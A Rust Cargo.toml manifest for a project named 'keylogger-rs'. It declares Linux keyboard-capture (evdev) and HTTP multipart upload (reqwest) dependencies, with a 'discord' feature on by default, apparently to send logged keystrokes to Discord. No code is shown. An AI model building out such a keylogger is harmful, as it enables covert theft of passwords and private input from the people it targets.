[package]
name = "keylogger-rs"
version = "0.1.0"
edition = "2024"

[dependencies]
clap = { version = "4.4", features = ["derive"] }
chrono = "0.4"
evdev = { version = "0.13", optional = true }
reqwest = { version = "0.11", features = ["blocking", "multipart"], optional = true }
ctrlc = "3.4.5"

[features]
default = ["linux", "discord"]
linux = ["evdev"]
discord = ["reqwest"]

[[bin]]
name = "keylogger-rs"
path = "src/main.rs"
